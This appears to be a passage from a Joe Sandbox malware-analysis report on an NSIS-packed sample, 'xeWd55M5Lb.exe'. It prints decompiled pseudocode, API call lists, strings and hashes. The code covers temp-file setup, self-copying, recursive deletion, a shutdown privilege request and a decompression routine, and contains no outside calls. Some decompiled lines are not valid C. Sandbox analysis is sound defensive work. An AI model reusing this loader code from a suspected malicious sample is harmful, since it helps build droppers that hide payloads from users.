															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406668(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037b0
0x004037b6
0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d1
0x004037d8
0x004037da
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x00403911
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,"C:\Users\user\Desktop\xeWd55M5Lb.exe" ,00000020,"C:\Users\user\Desktop\xeWd55M5Lb.exe" ,00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNELBASE(1033), ref: 00403982
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xeWd55M5Lb.exe" ,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32(C:\Users\user\Desktop\xeWd55M5Lb.exe,00420F08,00000001), ref: 00403B21
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
ExitProcess.KERNEL32(?), ref: 00403B6C
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
~nsu, xrefs: 00403A61
C:\Users\user\Desktop\xeWd55M5Lb.exe, xrefs: 00403B1C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
Error launching installer, xrefs: 00403A12
NSIS Error, xrefs: 004037A1
Low, xrefs: 0040394F
TEMP, xrefs: 00403961
SeShutdownPrivilege, xrefs: 00403BB4
.tmp, xrefs: 00403A7D
UXTHEME, xrefs: 0040372E, 00403733, 00403739
C:\Users\user\AppData\Local\Temp, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
1033, xrefs: 0040397D
\Temp, xrefs: 00403933
"C:\Users\user\Desktop\xeWd55M5Lb.exe" , xrefs: 004037B6, 004037BC, 004037D1, 004039A8, 004039B4, 00403A02, 00403A0C
TMP, xrefs: 00403969

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\xeWd55M5Lb.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xeWd55M5Lb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-2893184677
Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNELBASE(?,?,7620FAA0,7620F560,00000000), ref: 00405D9D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,\*.*), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,?,?,7620FAA0,7620F560,00000000), ref: 00405E0E
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*,?,?,7620FAA0,7620F560,00000000), ref: 00405E1E
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNELBASE(00000000), ref: 00405ECD

Strings

\*.*, xrefs: 00405DDF
C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*, xrefs: 00405DCD, 00405DD3, 00405DE4, 00405E1D
., xrefs: 00405E43
., xrefs: 00405E2F

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\nsa497E.tmp\*.*$\*.*
API String ID: 2035342205-793820261
Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
